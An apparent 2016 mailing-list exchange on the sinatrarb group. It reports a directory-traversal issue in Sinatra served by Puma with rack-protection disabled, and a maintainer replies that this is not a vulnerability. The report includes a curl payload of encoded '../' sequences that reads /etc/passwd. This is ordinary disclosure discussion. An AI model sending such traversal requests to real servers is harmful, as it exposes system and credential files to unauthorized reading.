Puma + Sinatra + protection disabled + static files = arbitrary file access via directory traversal

Zachary Scott

2016-10-05 02:25:35 UTC

If disabling the protection that prevents certain attacks makes you
vulnerable to said attacks, it's not a security exploit -- please use
the rack-protection gem.

On Tue, Oct 4, 2016 at 2:33 AM, 'Mathew Rowley' via sinatrarb

Post by 'Mathew Rowley' via sinatrarb
When Sinatra is run via Puma, is configured with `protection` disabled, and
hosts static files, a directory traversal bug exists.
gem install puma sinatra # use puma because webrick throws a Bad URI error
true"
curl
http://localhost:4567/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
It looks like this is known[0][1] and the PR comment explains that it does
not introduce a directory traversal bug, however it actually does. It would
be fair to say that the `rack-protection` middleware mitigates this from
being exploited, but if there is a code path to this method that includes a
directory traversal payload, it can be exploited. Yes, it is true that the
default configuration (protection enable) does prevent this from happening,
however even with protection disabled, should it be possible to access an
arbitrary file via directory traversal?
Mathew Rowley
[0] https://github.com/sinatra/sinatra/pull/779
[1] (Note: lighthouse link dead)
https://groups.google.com/forum/#!searchin/sinatrarb/traversal%7Csort:relevance/sinatrarb/6Vp3JQd-vzM/LjGsFVspjScJ
--
You received this message because you are subscribed to the Google Groups
"sinatrarb" group.
To unsubscribe from this group and stop receiving emails from it, send an
For more options, visit https://groups.google.com/d/optout.

--
You received this message because you are subscribed to the Google Groups "sinatrarb" group.
To unsubscribe from this group and stop receiving emails from it, send an email to sinatrarb+***@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.